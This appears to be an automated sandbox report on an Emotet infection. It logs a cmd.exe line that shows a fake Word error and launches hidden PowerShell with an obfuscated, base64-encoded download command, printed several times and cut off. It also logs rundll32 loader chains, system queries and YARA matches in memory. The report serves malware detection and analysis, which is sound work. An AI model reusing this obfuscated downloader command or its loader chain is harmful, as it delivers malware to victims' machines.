CcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2485894589.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2486292831.0000000002010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2485863461.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
